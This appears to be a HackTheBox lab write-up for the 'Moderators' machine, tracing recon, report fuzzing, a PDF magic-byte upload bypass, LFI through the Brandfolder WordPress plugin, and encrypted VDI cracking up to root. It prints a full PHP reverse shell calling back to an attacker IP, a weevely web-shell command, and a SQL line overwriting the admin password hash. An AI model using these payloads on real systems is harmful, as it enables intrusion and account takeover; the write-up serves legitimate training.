# HackTheBox - Moderators
## NMAP
```bash
Nmap scan report for 10.10.11.173
Host is up (0.091s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Moderators
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
We can find few usernames by scrolling down which might be useful
There's a search field but it doesn't work
Clicking the hamburger button we have few pages to explore out of which the blog page looks interesting has it's showing some bugs which were reported also the service page talks about the format of repots that are submitted
Going through some of the reports, it maksed the domain name
On the last report, it does give a hint about the subdomain which is `help` , I added `moderators.htb` in `hosts` file and tried fuzzing for subdomains with `wfuzz` but it didn't find anyhting, it could be that moderators.htb isn't the valid domain name
Running `gobuster` to fuzz for files and directories it returned `logs` which was interesting but returned a blank a page
Further fuzzing for it reveals `/uploads` and then a html file
Now on the blog page, there were links of 3 reports however the blog talked about 5 vulnerabilities, so maybe we need to fuzz the report number which consists of 4 digits, so let's make a wordlist of numbers with `runch`
We have a total of 6 reports now so let's visit them
Report #7612 shows a blind command injection on `actionmeter.org.htb` as patched
Report #2589 shows sql injection is patched on `healtharcade.io.htb`
And the last report , Report #9798 shows sensitive information disclosure as not patched
The domain names don't work, but the last report is quiet intersting as we already found `/logs` and the report tells that it accepts the report number as md5 hash
Remeber that the service page was talking about reports or logs being submitted in a pdf format so here we need to fuzz for pdf files in hashed report numbers
Here I have just looped through contents of the valid report numbers and converted them into md5 hash
I appended these hash in common.txt file as we can only use wordlist and used `feroxbuster` as it can recursively fuzz for files
This started to return `logs.pdf` in those hashed report numbers
For Report #7612 it showed some logs and a path to php file which uploads pdf files
## Foothold
If we try to upload a php file having this content it will only allow upload pdf files
```php
```
To bypass this, we can add a pdf magic byte in our php file which act as a pdf file also when uploading the file we have to change the Content-Type from `application/x-php` to `application/pdf`
The file is uploaded but on executing the commands through the `system` function it won't give any output
So it could be that some php functions are disabled, we can try to list the disabled functions through `phpinfo()`
So the functions `pass_thru`, `system`, `exec` , `shell_exec` and `pcntl_exec` are blocked , we can skip having the rce and directly just try getting a reverse shell from pentest monkey
```php
set_time_limit (0); $VERSION = "1.0"; $ip = "10.10.14.36"; $port = 2222; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\\n"; } }
```
On uploading this, we'll get a shell as `www-data`
Stabilizing the shell with python3 so we can get a better shell
Checking the services running on the machine with `ss -tulpn` we can there's 8080 open
We can use `chisel` to port forward 8080 which we can transfer by hosting through python3, also to add `moderators.htb` in our hosts file
This is using wordpress we can tell this by looking at `wapplayzer` extension
Also we can find the directory of wordpress which is `/opt/site.new` and it's owned by `lexi` user
We can't read `wp-config.php` which has the database password for wordpress, so we'll need to enumerate users
We do see 2 plugins
`password-manager` didn't had any exploist related to it
`Brandfolder` 3.0 is being used which had a LFI exploit
https://www.exploit-db.com/exploits/39591
The LFI exploit wasn't working
But the first poc was related to including the files from the `wp-admin` directory by providing an absolute path to that folder
## Privilege Escalation (lexi)
To exploit this, we need to create a folder in `/var/www/html/logs/uploads` because that's the folder which is writeable
In `post.php` I have included the `phpinfo();` to see if there any disabled functions
Visting the `callback.php` with the wordpress absolute path parameter `wp_abspath`
```
http://moderators.htb:8080/wp-content/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/
```
I tried the same reverse shell here as well but it didn't worked, although it doesn't show any disabled php functions but still none of the commands were working
I found a tool called `weevely` for generating obfuscated php shells
https://www.acunetix.com/blog/articles/web-shells-action-introduction-web-shells-part-4/
With this I generated a php script, now we need to replace this file with the one in includes directory
Making a request again with the absolute path variable with weevely we'll get a reverse shell as `lexi` user
```bash
./weevely.py http://moderators.htb:8080/wpcontent/plugins/brandfolder/callback.php?wp_abspath=/var/www/html/logs/uploads/wp/ uwu
```
We can grab this user's ssh key and login through ssh
The wordpress password can be found from `wp-config.php` and we can try this on `john` user
Which didn't worked, so we can look at the plugin which is a password manager, so we'll find something there, as we have access to wordpress database, we can change admin user's password
```
update wp_users SET user_pass = "$P$Bgz13AtQiY80g093FkqIKWQ8pIdLRX0" WHERE user_login = "admin";
```
From here we can get the ssh key for john
We can now login as john using his ssh key
In `stuff` directory we see two sub directories
`VBOX` has an virtual box image and`exp` has some chats related to it, it tallks about the password policy and about the Vbox disk image
Host the files from the target machine with python3
I honestly spend hours trying to mound the vdi with `qemu,` also converting into a raw format (.img) which didn't worked, tranferring the the files on windows machine, I tried importing the vdi image
So we have to make few changes into the vbox file as it's loading the vdi files `Ubuntu.vdi` and `2019.vdi` from `F:/2019.vdi`, so we need to provide it the full path also to remove the ubuntu.vdi and the ubuntu iso so the .vbox file will look like this after editing it
After importing this vdi, it wasn't working as whenever I tried attaching it to a VM it would pause, so I went into `Disk Encryption` option which prompted that it needs Oracle VM extension pack, which can be downloaded from here
https://download.virtualbox.org/virtualbox/6.1.36/Oracle_VM_VirtualBox_Extension_Pack-6.1.36a-152435.vbox-extpack
On installing the extension pack, it asks for the decrpytion password
For this we can use this python to crack VDI image
https://github.com/axcheron/pyvboxdie-cracker
Which gets cracked with the password `computer`
We can now decrypt the vdi image
Add into to an existing VM
Using `blkid` we can see the attached the vdi which is encrypted
https://forums.virtualbox.org/viewtopic.php?f=7&t=101848
To decrypt this we can use the script `grond.sh` with the same wordlist with which the vdi password was cracked
http://www.incredigeek.com/home/downloads/grond.sh
Having the password `abc123` we can mount this using `cryptsetup`
https://askubuntu.com/questions/63594/mount-encrypted-volumes-from-command-line
By following these commands we can mount the voulme
In `scripts/all-in-one` we can find a file named `distro_update.sh` having the password
Which we can use on `john` to list privleges for the user and we can run everything as root
## References
- https://www.exploit-db.com/exploits/39591
- https://www.acunetix.com/blog/articles/web-shells-action-introduction-web-shells-part-4/
- https://www.useotools.com/wordpress-password-hash-generator/output
- https://github.com/axcheron/pyvboxdie-cracker
- https://forums.virtualbox.org/viewtopic.php?f=7&t=101848
- https://gist.github.com/micxer/63b49e09558904dd64ef78400c6b9517
- http://www.incredigeek.com/home/downloads/grond.sh
- https://askubuntu.com/questions/63594/mount-encrypted-volumes-from-command-line